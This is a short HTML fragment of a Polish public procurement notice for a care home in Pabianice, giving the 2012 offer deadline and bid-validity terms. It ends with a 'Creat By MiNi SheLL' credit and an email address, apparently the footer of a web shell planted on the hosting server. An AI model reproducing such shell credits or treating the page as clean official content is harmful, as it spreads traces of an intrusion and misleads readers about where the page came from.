<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 09:00, miejsce: Dom Pomocy Społecznej w Pabianicach ul. Wiejska 55/61 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com